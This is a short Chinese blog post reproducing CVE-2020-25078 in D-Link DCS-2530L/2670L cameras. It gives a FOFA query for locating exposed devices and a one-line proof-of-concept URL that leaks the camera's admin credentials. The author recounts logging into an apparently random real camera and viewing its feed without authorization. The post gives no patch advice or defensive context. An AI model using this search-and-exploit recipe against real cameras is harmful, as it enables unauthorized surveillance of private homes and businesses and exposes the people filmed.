D-Link DCS-2530L和DCS-2670L监控信息泄露漏洞(CVE-2020-25078)复现
作者:互联网
D-Link DCS-2530L和DCS-2670L存在监控信息泄露漏洞,此漏洞利用如此简单,危害如此之大,不禁让人惊叹恐怖如斯。
fofa搜索: app="D_LINK_DCS_2530L"
随便进入一个,是登录界面,需要登录口令:
POC如下:
http://xx.xx.xx.xx/config/getuser?index=0
直接可以读取到监控页面的账户密码
接下来回到刚才的登陆界面正常输入口令即可进入
看了几秒就不敢看了,这玩意太可怕了。。
标签:25078,漏洞,xx,2530L,Link,2670L,DCS 来源: https://www.cnblogs.com/zcg-cpdd/p/14603997.html